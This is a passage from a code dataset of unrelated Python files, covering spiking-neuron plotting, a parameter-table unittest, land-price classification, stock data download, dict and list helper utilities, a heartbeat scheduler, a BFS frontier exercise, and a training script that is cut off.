, label = 'Neuron 0')\r\n plt.plot(M.t/ms , M.v[1] , label = 'Neuron 1')\r\n plt.plot(M.t/ms , M.v[2] , label = 'Neuron 2' , color = 'black')\r\n plt.xlabel('Time (ms)')\r\n plt.ylabel('v')\r\n plt.legend()\r\n plt.show()\r\n \r\n \r\n","sub_path":"b_snn_synapses_recap.py","file_name":"b_snn_synapses_recap.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591596428","text":"# -*- coding:utf-8 -*-\n\nimport unittest\nfrom sqlalchemy.orm import joinedload_all\nfrom ..base import utils\nimport datetime\n\nimport csv\nimport logging\n\nfrom ..model.t_para import *\nlog = logging.getLogger()\n\nclass TestPara(unittest.TestCase):\n\n def setUp(self):\n self.session=simple_session()\n logging.debug(\"finish!!!\")\n init_para(self.session) \n \n def tearDown(self):\n logging.debug(\"finish!!!\")\n\ndef init_para(session):\n logging.debug(\"init tpara\")\n \n for k,v in tdict.items():\n rs = init_para_file(k,v)\n if k =='T_PARA_TYPE':\n for data in rs:\n session.add(T_Para_Type(**data))\n if k =='T_PARA_DETAIL':\n for data in rs:\n session.add(T_Para_Detail(**data))\n if k =='T_PARA_ROW':\n for data in rs:\n session.add(T_Para_Row(**data))\n if k =='T_PARA_HEADER':\n for data in rs:\n session.add(T_Para_Header(**data))\n\n session.commit()\n\ntdict = {\n 'T_PARA_TYPE':[\"ID\",\"TYPE_STATUS\",\"TYPE_NAME\", \"TYPE_MODULE\",\"TYPE_KEY\" ,\"TYPE_DETAIL\" ],\n 'T_PARA_ROW':[\"ID\" ,\"PARA_TYPE_ID\" ,\"ROW_NUM\", \"ROW_STATUS\" ,\"ROW_START_DATE\",\"ROW_END_DATE\"],\n 'T_PARA_HEADER':[\"ID\",\"PARA_TYPE_ID\",\"HEADER_NAME\" ,\"HEADER_KEY\" ,\"HEADER_ORDER\" ,\"HEADER_DETAIL\" ,\"HEADER_TYPE\" ,\"HEADER_STATUS\" ],\n 'T_PARA_DETAIL':[\"ID\",\"PARA_HEADER_ID\" ,\"PARA_ROW_ID\",\"DETAIL_VALUE\",\"DETAIL_KEY\"]\n}\n\ndef init_para_file(type,fildlist):\n path = \"%s.del\"%type\n csv_reader = csv.reader(path)\n rs =[]\n for row in csv_reader:\n data={}\n i = 0\n for item in row:\n data[fildlist[i]] = item\n return rs\n","sub_path":"src_20170503/src/web/server/fabs/tests/test_tpara.py","file_name":"test_tpara.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289188642","text":"#!/usr/bin/env python\n\nfrom floe.api import WorkFloe\n\nfrom orionplatform.cubes import DatasetReaderCube, DatasetWriterCube\n\nfrom MDOrion.TrjAnalysis.cubes_clusterAnalysis import ParallelClusterOETrajCube, ParallelMakeClusterTrajOEMols\n\njob = WorkFloe(\"Testing Traj OEMol Clustering on a conformer\")\n\njob.description = \"\"\"\nTesting Ligand Clustering Floe on a conformer\n#\nEx. python floes/ConfBasedTrajClustering.py --in STMD_TrajOEMol.oedb --out STMD_LigClus.oedb\n#\nParameters:\n-----------\nin (.oedb file): file of the MD results with Traj OEMols\n#\nOutputs:\n--------\nofs (.oedb file): file of the MD results with Traj OEMol Clustering on a conformer.\n\"\"\"\n\n# job.uuid = \"7cacc2af-cae7-4dc7-8956-fcf539861e3d\"\n\nifs = DatasetReaderCube(\"ifs\")\n\nifs.promote_parameter(\"data_in\", promoted_name=\"in\", title=\"System Input OERecord\", description=\"OERecord file name\")\n\nclusCube = ParallelClusterOETrajCube(\"ClusterOETrajCube\")\nclusOEMols = ParallelMakeClusterTrajOEMols('MakeClusterTrajOEMols')\n\nofs = DatasetWriterCube('ofs', title='OFS-Success')\nofs.promote_parameter(\"data_out\", promoted_name=\"out\", title=\"System Output OERecord\", description=\"OERecord file name\")\n\njob.add_cubes(ifs, clusCube, clusOEMols, ofs)\n\nifs.success.connect(clusCube.intake)\nclusCube.success.connect(clusOEMols.intake)\nclusOEMols.success.connect(ofs.intake)\n\nif __name__ == \"__main__\":\n job.run()\n","sub_path":"floes_dev/ConfBasedTrajClustering_floe.py","file_name":"ConfBasedTrajClustering_floe.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"168300326","text":"import argparse\nimport csv\nfrom os.path import abspath\nfrom sklearn.model_selection import train_test_split\n\nfrom configuration.configuration_constants import excluded_values, \\\n file_name_predicted_price_categories_values, \\\n target_column_name, \\\n limit_date, \\\n path_to_trained_models\nfrom classification_module import CalculateValue, \\\n ClassificationLogisticRegressionModel, \\\n get_model\nfrom utils.database_handler import DatabaseHandler\nfrom utils.file_names_builder import make_file_name\nfrom utils.serialization_module import create_logger\n\nquery_step_iterate = 200000\n\nparser = argparse.ArgumentParser(description='Program to predict category of land price.')\nparser.add_argument('--save_to_database',\n action='store_true',\n default=False,\n help='Specify whether to save the values into the database.')\nparser.add_argument('--model_overwrite',\n action='store_true',\n default=False,\n help='Specify whether to override the model.')\n\nlogger = create_logger()\n\n\ndef classification_regression_with_test_set():\n database_handler = DatabaseHandler()\n query = \"EXEC dbo.GetDataToTrainClassificationModel @LimitDate = {}, @ExcludedList ='{}'\".format(limit_date,\n excluded_values)\n data = database_handler.execute_query(query)\n train, test = train_test_split(data, test_size=0.2)\n model = ClassificationLogisticRegressionModel(input_data=train, target_column_name=target_column_name)\n prediction = CalculateValue(model).predict(data_to_predict=test)\n from sklearn.metrics import accuracy_score\n print(accuracy_score(y_true=test[target_column_name], y_pred=prediction))\n database_handler.close_connection()\n for predictionItem, realItem in zip(prediction, test[target_column_name]):\n if predictionItem != realItem:\n print(predictionItem)\n print(realItem)\n print(\"\\n\")\n\n\ndef classification_regression(save_to_database=False, overwrite_model=False):\n database_handler = DatabaseHandler()\n model_file_name = make_file_name(base_name=path_to_trained_models + \"classification_\",\n _limit_date=limit_date,\n extension='.sav')\n\n model = get_model(\"EXEC dbo.GetDataToTrainClassificationModel @LimitDate = {}, @ExcludedList ='{}'\"\n .format(limit_date, excluded_values),\n target_column=target_column_name,\n model_file_name=abspath(model_file_name),\n database_handler=database_handler,\n overwrite=overwrite_model)\n\n min_max_object_id = \\\n database_handler.execute_query(\"EXEC dbo.GetMinimumAndMaxumimObjectID_ParcelVectors \"\n \"@LimitDate = {}, @ExcludedList ='{}'\"\n .format(limit_date, excluded_values))\n min_object_id = min_max_object_id.iloc[0][\"MinimumObjectID\"]\n max_object_id = min_max_object_id.iloc[0][\"MaximumObjectID\"]\n try:\n with open(make_file_name(file_name_predicted_price_categories_values, extension='.csv'), mode='a') \\\n as estimated_bucket_values:\n estimated_bucket_writer = csv.writer(estimated_bucket_values,\n delimiter=',',\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n\n tmp_min = min_object_id\n while tmp_min < max_object_id:\n if tmp_min + query_step_iterate < max_object_id:\n tmp_max = tmp_min + query_step_iterate\n else:\n tmp_max = max_object_id\n df_parcels_to_estimate_price_group = database_handler.execute_query(\n \"EXEC dbo.GetDataToParcelClassification \"\n \"@LimitDate = {}, @ExcludedList='{}', @ObjectIdMin = {}, @ObjectIdMax = {}\"\n .format(limit_date, excluded_values, tmp_min, tmp_max))\n prediction = CalculateValue(model).predict(data_to_predict=df_parcels_to_estimate_price_group)\n for (prediction_value, object_id) in zip(prediction, df_parcels_to_estimate_price_group['OBJECTID']):\n if save_to_database:\n query = (\"EXEC dbo.UpdateEstimatedPriceCategoryGroup \"\n \"@NEW_Estimated_Price_Group = {}, @ObjectID = {} \"\n .format(prediction_value, object_id))\n database_handler.cursor.execute(query)\n database_handler.conn.commit()\n\n estimated_bucket_writer.writerow([object_id, prediction_value])\n\n tmp_min = tmp_max\n finally:\n database_handler.close_connection()\n logger.info('Classification prediction is done.')\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n classification_regression(save_to_database=args.save_to_database, overwrite_model=args.model_overwrite)\n","sub_path":"parcels_valuation/src/init_classification.py","file_name":"init_classification.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"314308773","text":"import csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neural_network import MLPRegressor\n\ndef neural_network_sklearn(x,y,nx):\n\n neuralNetwork = MLPRegressor(solver='lbfgs', alpha=0.0005)\n model = neuralNetwork.fit(x,y)\n\n ny = neuralNetwork.predict(nx)\n\n out = open('test-A\\out.tsv', 'w')\n for nyi in ny:\n out.write(str(nyi)+'\\n')\n print(nyi)\n\ndef normalize(dataset):\n \n dataset = dataset[['Powierzchnia w m2', 'Liczba pokoi', 'Rok budowy', 'Piętro']]\n dataset = dataset.replace({'parter':0, 'poddasze': 0}, regex = True)\n dataset['Piętro'].fillna(round(dataset['Piętro'].median(), 0), inplace = True)\n dataset['Rok budowy'].fillna(round(dataset['Rok budowy'].median(), 0), inplace = True)\n return dataset\n\ndef import_data():\n\n reader = pd.read_csv('train/train.tsv', delimiter ='\\t')\n columns = reader.columns[1:]\n test = pd.read_csv('test-A/in.tsv', delimiter ='\\t', header = None, names = columns)\n\n y = reader['cena']\n x = normalize(reader)\n nx = normalize(test)\n\n return (x,y,nx)\n\ndef main():\n \n import_xy = import_data()\n x = import_xy[0]\n y = import_xy[1]\n nx = import_xy[2]\n\n neural_network_sklearn(x,y,nx)\n \n\nif __name__== \"__main__\":\n \n main()\n","sub_path":"mieszkania4/program_neural.py","file_name":"program_neural.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450966144","text":"import datetime as dt\nimport time as tm\nimport csv\nimport requests\n\nYF_EXPORT_URL = 'https://query1.finance.yahoo.com/v7/finance/download/{ticker}?period1={period_start}&period2={period_end}&interval=1d&events=history&includeAdjustedClose=true'\n\n\ndef get_csv_url(csv_url):\n \"\"\"\n Take a csv url and return the data as a list of lists\n \"\"\"\n with requests.Session() as s:\n download = s.get(csv_url)\n\n decoded_content = download.content.decode('utf-8')\n\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n return list(cr)\n\n\ndef export_stock_historical_data(stock_ticker, start_datetime, end_datetime):\n \"\"\"\n Take a stock ticker symbol, a datetime start, and a datetime end, \n \n return yahoo finance daily data for time range as a list of lists\n \"\"\"\n\n start_unix = int(tm.mktime(start_datetime.date().timetuple()))\n end_unix = int(tm.mktime(end_datetime.date().timetuple()))\n\n csv_url = YF_EXPORT_URL.format(\n ticker=stock_ticker,\n period_start=start_unix,\n period_end=end_unix\n )\n return get_csv_url(csv_url)\n","sub_path":"utils/yahoo_finance.py","file_name":"yahoo_finance.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"584869210","text":"import time\ndef tprint(obj, except_word=\"\"):\n \"\"\"\n #脚本编辑打印辅助工具\n ┏━━━━┳━━┓\n ┃传入值 ┃类型┃\n ┣━━━━╋━━┫\n ┃任何变量┃ all┃\n ┗━━━━┻━━┛\n #要复制到编写的函数中使用,不可跨py使用\n \"\"\"\n for name, item in globals().items():\n if item == obj and name != except_word:\n print(name + ':',type(obj))\n print(obj)\n print()\n\ndef if_differ_str(_first, _second):\n \"\"\"\n #传入两个值将两个值转换为str进行对比\n #如果两个是一致的那么返回值1,如果两个值不同返回0\n :param _first: 第一个字符串\n :param _second: 第二个字符串\n :return: 比较结果\n \"\"\"\n _first=str(_first)\n _second=str(_second)\n if _first == _second:\n return_value = 1\n else:\n return_value = 0\n return return_value\n\n\ndef getLastDict(_dict):\n \"\"\"\n 将字典里面的最后一个键值对取出\n :param _dict: 要被取出的字典\n :return: 最后的一对键值对\n \"\"\"\n _list = list(_dict.keys())\n length = len(_list)\n dict_key = _list[length - 1]\n result_value = _dict[dict_key]\n return dict_key, result_value\n\ndef dict_JieQuBanDuan(_dict,key,diction='right'):\n \"\"\"\n #截取传入key的前半段或者后半段\n #前半段left后半段rignt\n #{.........left........|........right..........}\n :param _dict: 要被截取的dict\n :param key: 要截取段中的键值\n :param diction: 方向,截取方向,向后或者向前(left/right)\n :return: 截取到的dict\n \"\"\"\n in_time = key\n _list = list(_dict.keys())\n a = _list.index(in_time)\n final_dict = {}\n if diction == 'left':\n for i in range(a + 1):\n value = _dict[_list[i]]\n assembly_dict = eval(\"{'\" + str(_list[i]) + \"':\" + str(value) + \"}\")\n final_dict.update(assembly_dict)\n elif diction == 'right':\n _list_right = _list[a:]\n for i in _list_right:\n value = _dict[i]\n assembly_dict = eval(\"{'\" + str(i) + \"':\" + str(value) + \"}\")\n final_dict.update(assembly_dict)\n else:\n print('参数错误')\n return final_dict\n\n\n\ndef value_2_key(_dict,_value):\n\n \"\"\"\n #传入字典和字典内存在的value,返回其value的key值\n 知道value反推可以,尽量保证value单一\n :param _dict: 被筛选的dict\n :param _value: 要找到的value值\n :return: key值\n \"\"\"\n try:\n a1 = list(_dict.keys())[list(_dict.values()).index(_value)]\n except Exception as e:\n print('value 2 key出错')\n print(e)\n return a1\n\n\n\ndef find_max_or_min_in_list(_list=[],_geshu=1,max_or_min='max'):\n \"\"\"\n 返回list中最大的几个值,或者最小的几个值\n :param _list: 要进行比较的list\n :param _geshu: 取出最值的个数\n :param max_or_min: 输入为\"max\"或者是\"min\"表示要取出的是最大还是最小\n :return: 取出的几个最值\n \"\"\"\n _return_list = []\n if len(_list)<=_geshu:\n print(\"传入长度小于取值个数\")\n else:\n if max_or_min=='max':\n for i in range(_geshu):\n return_value = max(_list)\n _list.remove(return_value)\n _return_list.append(return_value)\n elif max_or_min=='min':\n for i in range(_geshu):\n return_value = min(_list)\n _list.remove(return_value)\n _return_list.append(return_value)\n else:\n print('未接收到最大/最小取值')\n return _return_list\n\n\ndef find_dict_key_and_fetch_value_to_list(_dict={},_key_list=[]):\n \"\"\"\n 遍历字典将list中的值对应字典中的key的值取出\n :param _dict: dict数据\n :param _key_list: 要取出的键的列表\n :return: 取出的dict\n \"\"\"\n return_list = []\n for i in _key_list:\n return_list_value = _dict[i]\n return_list.append(return_list_value)\n return return_list\n\n\n\ndef dict_cut_out_piece_in_sequence(_dict,start_position,end_num=1):\n \"\"\"\n 从字典中选择一个起始位置向后截取end_num个键值对并返回\n start_position为dict中想要开始截取的起始未知的key\n :param _dict: 要被截取的dict\n :param start_position: 起始位置(该位置的键值)\n :param end_num: 截取到该位置后的第几个\n :return: 返回截取的dict段\n \"\"\"\n try:\n _list = list(_dict.keys())\n num_s = _list.index(start_position)\n ifcode = len(_list)-(num_s+end_num)\n if ifcode<0:\n end_num = len(_list) - num_s\n e1 = '截取值溢出,修改截取值为最末位'+str(end_num)\n\n else:\n #pass\n num_e = num_s+int(end_num)\n _list = _list[num_s:num_e]\n return_dict = {}\n for i in _list:\n return_dict_update =eval(\"{'\"+str(i)+\"':'\"+str(_dict[i])+\"'}\")\n return_dict.update(return_dict_update)\n return return_dict\n except Exception as e:\n print(e)\n\ndef fetch_dict_by_num(_dict, num):\n \"\"\"\n 取出字典中顺序的第num个\n :param _dict: 要取出的字典数据\n :param num: 要取第num个\n :return: 第num个键值对\n \"\"\"\n _dict = _dict\n _list = list(_dict.keys())\n i = _list[num - 1] # num-1\n i_value = _dict[i]\n strings = \"{'\" + str(i) + \"':\" + str(i_value) + \"}\"\n return_dict = eval(strings)\n return return_dict\n\ndef abandon_front_section_dict(dict={},num=1):\n \"\"\"\n 舍弃掉list中前几个键值对,如果舍弃个数大于整个dict的键值对个数将会报错\n :param dict: 将要被舍弃的dict\n :param num: 舍弃前面键值对的个数\n :return: 被舍弃后的dict\n \"\"\"\n _keylist=list(dict.keys())\n if num>len(_keylist):\n print(\"舍弃个数长于字典键值对个数\")\n else:\n abandonlist = []\n while 1<2:\n if num>0:\n value = _keylist[num-1]\n abandonlist.append(value)\n num=num-1\n else:\n break\n for i1 in list(abandonlist):\n dict.pop(i1)\n return dict\n\ndef fetch_maxormin_key_pairs(indict={},maxormin='max',num=1):\n \"\"\"\n 取出最大或者最小的键值对\n :param dict: 要处理的字典\n :param maxormin: 输入为最大或者最小max,min\n :param num: 取多少个\n :return: 返回值为取出最大/最小的键值对的字典\n \"\"\"\n dict = indict\n controlnum = 1\n while 1<2:\n returndict={}\n if len(dict)=float(dict[i]):\n dict_value=float(dict[i])\n madedict = {str(i):str(dict_value)}\n else:\n print('请输入正确的取值,max/min:')\n maxormin=input()\n continue\n returndict.update(madedict)\n dict.pop(i)\n controlnum=controlnum+1\n if controlnum>num:\n return returndict\n break\n\ndef Erase_delete_corresponding_value(dict,value):\n \"\"\"\n 遍历dict删除对应value值的键值对\n :param dict:待处理字典\n :param value:要去掉的value值\n :return:处理完成的字典\n \"\"\"\n keylist=list(dict.keys())\n for i in keylist:\n ifcode = dict[i]\n if ifcode == value:\n dict.pop(i)\n else:\n pass\n return dict\n\ndef daysUnix():\n #获取今日的时间戳(今日0时)\n now_time = int(time.time())\n day_time = now_time - now_time % 86400 + time.timezone\n unix=str(day_time)+\"000\"\n return unix\n\n\n\nif __name__ == '__main__':\n _dict = {'a':3,'b':2,'c':3,'d':4}","sub_path":"DATA_PROCESSING/BASE_CONDITIONING_MODES_AND_FUCTIONS/self_encapsulation_scripts.py","file_name":"self_encapsulation_scripts.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"116967004","text":"#encoding=utf-8\nimport logging\nimport signal\nimport functools\nfrom yuanneng.core import network\nfrom cProfile import Profile\nfrom copy import copy\nfrom time import time\nfrom yuanneng.utils import rand_str\nfrom yuanneng.cfg import is_open_cpu_profiler\nfrom yuanneng import scheduler_manager\n\nif is_open_cpu_profiler:\n profiler = Profile()\n\n__all__ = ['HeartBeat','call_out','remove_call_out']\n\ndef init():\n \"\"\"heartbeat初始化方法\n 应在应用程序启动时调用一次\n \"\"\"\n global objset,remove_set,shutdown,callout_set,beating\n objset = set()\n remove_set = set()\n beating = False\n shutdown = False\n callout_set = set()\n\n global hb_flag\n hb_flag = False\n signal.signal(signal.SIGALRM,_set_hb_flag)\n signal.siginterrupt(signal.SIGALRM,False)\n\ndef start():\n signal.setitimer(signal.ITIMER_REAL,1,0.05)\n\ndef destory():\n \"\"\" heartbeat清理方法\n 应在应用程序结束时调用一次\n \"\"\"\n global shutdown,objset\n shutdown = True\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n\ndef call_out(delay,func,*args,**kws):\n \"\"\" call_out延迟调用\n 用法heartbeat.call_out(3,func)或者call_out(2,func,3,4,5)或者call_out(4,func,2,a='1')\n \"\"\"\n callout_obj = CallOut(delay,func,*args,**kws)\n callout_set.add(callout_obj)\n return callout_obj\n\ndef remove_call_out(callout_obj):\n callout_set.remove(callout_obj)\n\ndef call_out_size():\n \"\"\" 获取延迟调用的个数\n \"\"\"\n return len(callout_set)\n\ndef _register(obj):\n \"\"\" 注册一个心跳对象,心跳模块内部使用\n \"\"\"\n objset.add(obj)\n\ndef _remove(obj):\n \"\"\" 移除掉一个已经注册过的心跳对象,心跳模块内部使用\n \"\"\"\n try:\n if beating:\n remove_set.add(obj)\n else:\n objset.remove(obj)\n return True\n except KeyError:\n return False\n\ndef get_obj_count():\n \"\"\" 获取心跳tick为某个值的对象个数\n \"\"\"\n return len(objset)\n\ndef _set_hb_flag(sig,frame):\n \"\"\"闹钟到时,设置心跳标志\"\"\"\n global hb_flag\n # if hb_flag:\n # logging.warn(\"pre heartbeat don't be called\")\n hb_flag = True\n\ndef check_beat():\n \"\"\" 心跳跳动,心跳模块内部使用\n \"\"\"\n if is_open_cpu_profiler:\n profiler.enable()\n start_s = time()\n network.add_ioloop_callback(check_beat)\n global hb_flag\n scheduler_manager.check()\n if shutdown:\n return\n elif hb_flag:\n hb_flag = False\n global beating, objset\n beating = True\n for obj in copy(objset):\n obj._beat()\n beating = False\n if remove_set:\n objset = objset - remove_set\n remove_set.clear()\n for callout in copy(callout_set):\n callout._beat()\n if not callout.valid():\n callout_set.remove(callout)\n if is_open_cpu_profiler:\n end_s = time()\n cost_ms = (end_s - start_s) * 1000\n if cost_ms > 10:\n profiler.dump_stats(\"logs/hb-%s-%s.prof\" % (round(cost_ms,0),rand_str(4)))\n profiler.clear()\n\nclass HeartBeat(object):\n \"\"\" heartbeat类\n 要实现heartbeat功能的对象,其类需继承该类\n 调用set_heart_beat(tick)方法来指定多长间隔执行一次心跳\n 重写heart_beat(self)方法,来指定当心跳执行时的操作\n 若一个对象不需要心跳功能,不调用set_heart_beat()方法即可\n 在移除掉一个对象时,若该对象还存在心跳,则需调用set_heart_beat(0)来移除掉它的心跳\n 心跳模块会移除掉该对象的引用,使其可被垃圾回收\n \"\"\"\n\n def heart_beat(self):\n \"\"\" 心跳执的逻辑处理,该类的子类,应该重写此方法\n \"\"\"\n logging.debug(\"the default behaviour of heart_beat action\")\n\n def _beat(self):\n self._curtick -= 1\n if not self._curtick:\n self._curtick = self._tick\n try:\n self.heart_beat()\n except Exception as e:\n logging.warn(\"caught exception %s in heartbeat\",e,exc_info = True)\n\n def set_heart_beat(self,tick,imm = False, left_tick = None):\n \"\"\" 设置心跳间隔,参数为整数\n imm : 立即触发一次心跳\n left_tick: 指定tick后触发一次心跳\n \"\"\"\n if tick == 0:\n _remove(self)\n # try:\n # logging.info(\"remove _tick value\")\n # except AttributeError:\n # logging.warn(\"remove _tick failed\")\n # try:\n\n # except AttributeError:\n # pass\n else:\n self._tick = tick\n if imm:\n self._curtick = 1\n elif left_tick:\n self._curtick = left_tick\n else:\n self._curtick = tick\n _register(self)\n\nclass CallOut(object):\n def __init__(self,delay,func,*args,**kws):\n if args or kws:\n func = functools.partial(func,*args,**kws)\n self._func = func\n self._curtick = delay * 20\n\n def _beat(self):\n self._curtick -= 1\n if not self._curtick:\n try:\n self._func()\n except:\n logging.warn(\"exception when executing callout\", exc_info = True)\n\n def valid(self):\n return self._curtick > 0\n","sub_path":"yuanneng/core/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"204583936","text":"from search import *\nimport collections \n\n\nclass BFSFrontier(Frontier):\n \"\"\"Implements a frontier container appropriate for depth-first\n search.\"\"\"\n\n def __init__(self):\n \"\"\"The constructor takes no argument. It initialises the\n container to an empty stack.\"\"\"\n self.container = collections.deque()\n\n def add(self, path):\n print('add',path)\n self.container.append(path)\n print(self.container)\n\n def __iter__(self):\n \"\"\"The object returns itself because it is implementing a __next__\n method and does not need any additional state for iteration.\"\"\"\n return self\n \n def __next__(self):\n if len(self.container) > 0:\n pass\n a = self.container.popleft()\n \n \n print(\"->\",a,type(a))\n return (a)\n # return self.container.popleft()\n else:\n raise StopIteration # don't change this one\n \n\n\n\n\n\nfrom search import *\n\n\ngraph = ExplicitGraph(nodes=set('SAG'),\n edge_list = [('S','A'), ('S', 'G'), ('A', 'G')],\n starting_nodes = ['S'],\n goal_nodes = {'G'})\n\nsolutions = generic_search(graph, BFSFrontier())\nsolution = next(solutions, None)\nprint_actions(solution)\n\n\nfrom search import *\n\n\nflights = ExplicitGraph(nodes=['Christchurch', 'Auckland', \n 'Wellington', 'Gold Coast'],\n edge_list = [('Christchurch', 'Gold Coast'),\n ('Christchurch','Auckland'),\n ('Christchurch','Wellington'),\n ('Wellington', 'Gold Coast'),\n ('Wellington', 'Auckland'),\n ('Auckland', 'Gold Coast')],\n starting_nodes = ['Christchurch'],\n goal_nodes = {'Gold Coast'})\n\nmy_itinerary = next(generic_search(flights, BFSFrontier()), None)\nprint_actions(my_itinerary)","sub_path":"Lab 2/bfs-frontier.py","file_name":"bfs-frontier.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286817636","text":"#增:\r\ndef insertList():\r\n or_list = [1, \"abc\", 2.51]\r\n or_list.append(\"JavaScript\") # append()方法在列表末尾追加元素(以整体形式追加)\r\n or_list.insert(0, \"Python\")\r\n print(\"or_list is: \", or_list)\r\n#用insert()方法可以实现在列表中增加元素。insert()方法需要写明增加在哪个位置和增加的内容,新元素的实际位置是在指定位置元素之前的位置;如果指定的位置不存在,默认会增加在列表末尾;\r\n or_list = [1, \"abc\", 2.51]\r\n or_list[0:0] = [9] # [0:0]是指在列表中的第1个位置插入新元素\r\n or_list[3:3] = \"a\" # [3:3]是指在列表中的第4个位置插入新元素\r\n print(\"or_list is: \", or_list)\r\n\r\n#上面的这两种方法都是添加单个元素,除了添加单个元素,还可以添加多个元素,用extend()方法来实现:\r\n or_list = [1, \"abc\", 2.51]\r\n ex_list = [\"Python\", 23, \"game\"]\r\n or_list.extend(ex_list) # extend()方法用于在列表末尾一次性追加另一个列表的多个值\r\n print(\"or_list is: \", or_list)\r\n\r\n#删:\r\ndef deleteList():\r\n or_list = [1, \"abc\", 2.51]\r\n or_list.remove(1)\r\n print(\"or_list is: \", or_list)\r\n or_list.pop() #移除最后一个\r\n print(\"or_list is: \", or_list)\r\n #删除列表元素除了remove()方法外,也可以用del关键字来声明:\r\n del or_list[0:2] # [0:2]删除第1个和第2个位置元素\r\n print(\"or_list is: \", or_list)\r\n\r\n#改:\r\ndef updateList():\r\n lst = [1, \"abc\", 2.51]\r\n lst[0] = \"start\"\r\n lst[2] = 777\r\n print(\"lst is: \", lst)\r\n #如果想要替换掉列表中的某个元素,可以直接给列表某位置的元素重新赋值,lst[2]指lst列表中的第3个元素;\r\n\r\n#查:\r\ndef searchList():\r\n #列表的索引与字符串的索引类似,同样是分正反两种索引方式,可以从后往前,也可以从前往后所以,比如:\r\n src_list = [1, \"abc\", 2.51]\r\n # 输出第2个位置和倒数第1个位置的元素\r\n print(src_list[1], src_list[-1])\r\n\r\n # 输出第1、2个元素和第2到最后一个元素\r\n print(src_list[:2], src_list[1:])\r\n #但是如果想查看某个元素的位置,就需要使用下面这种方式:\r\n src_list = [1, \"abc\", 2.5, 360]\r\n print(src_list.index(2.5))\r\n #这里需要注意的是,如果index()查找的元素不在列表里面,程序会产生ValueError:\"xxx\" is not in list\r\n\r\n#其他:\r\ndef func(a, b):\r\n return True if a > b else False\r\n\r\ndef sortList():\r\n '''\r\n list.sort(cmp=None, key=None, reverse=False)\r\n cmp -- 可选参数, 如果指定了该参数会使用该参数的方法进行排序。\r\n key -- 主要是用来进行比较的元素,只有一个参数,具体的函数的参数就是取自于可迭代对象中,指定可迭代对象中的一个元素来进行排序。\r\n reverse -- 排序规则,reverse = True 降序, reverse = False 升序(默认)。\r\n '''\r\n src_list = [1, 7, 2, 5, 4, 6, 3]\r\n src_list.sort() #排序\r\n print(src_list)\r\n src_list = [1, 7, 2, 5, 4, 6, 3]\r\n src_list.sort(reverse=True)\r\n print(src_list)\r\n\r\ndef otherListOperate():\r\n #src_list = [1, \"abc\", 2.51]\r\n src_list = [1, 7, 2, 5, 4, 6, 3]\r\n src_list.reverse() #反转\r\n print(src_list)\r\n \r\n\r\n#操作符 + - in for\r\ndef main():\r\n #insertList()\r\n #deleteList()\r\n #updateList()\r\n #searchList()\r\n sortList()\r\n #otherListOperate()\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"Day16-20/Day16/code/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"155530951","text":"from tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\n\nimport argparse\nimport subprocess\nimport datetime\nimport yaml\nfrom shutil import copyfile\nimport os\nimport shutil\nimport __init__ as booger\n\nimport torch\nfrom torchvision import models\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\n\nimport sys\nsys.path.append('../')\nfrom common import trainer_mod\nfrom common import make_datalist_mod\nfrom common import data_transform_mod\nfrom common import dataset_mod\nfrom common import dnn_network\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(\"./train.py\")\n\n parser.add_argument(\n '--train_cfg', '-c',\n type=str,\n required=False,\n default='/home/ros_catkin_ws/src/dnn_attitude_predictor_with_image/config/train_config.yaml',\n help='Train hyperparameter config file',\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n\n #load yaml file\n try:\n print(\"Opening train config file %s\", FLAGS.train_cfg)\n CFG = yaml.safe_load(open(FLAGS.train_cfg, 'r'))\n except Exception as e:\n print(e)\n print(\"Error opening train config file %s\", FLAGS.train_cfg)\n quit()\n\n #get file paths\n method_name = CFG[\"method_name\"]\n dataset_top_path = CFG[\"dataset_top_path\"]\n experiment_type = CFG[\"experiment_type\"]\n image_env = CFG[\"image_env\"]\n train_sequences = CFG[\"train\"] #string\n valid_sequences = CFG[\"valid\"]\n csv_name = CFG[\"csv_name\"]\n weights_path = CFG[\"weights_path\"]\n log_path = CFG[\"log_path\"]\n graph_path = CFG[\"graph_path\"]\n\n #get train and valid root path\n list_train_rootpaths = []\n list_valid_rootpaths = []\n\n for i in train_sequences:\n tmp_path = dataset_top_path + experiment_type + image_env + i\n list_train_rootpaths.append(tmp_path)\n \n for i in valid_sequences:\n tmp_path = dataset_top_path + experiment_type + image_env + i\n list_valid_rootpaths.append(tmp_path)\n\n #get hyperparameter for learning\n resize = CFG[\"hyperparameter\"][\"resize\"]\n mean_element = CFG[\"hyperparameter\"][\"mean_element\"]\n std_element = CFG[\"hyperparameter\"][\"std_element\"]\n hor_fov_deg = 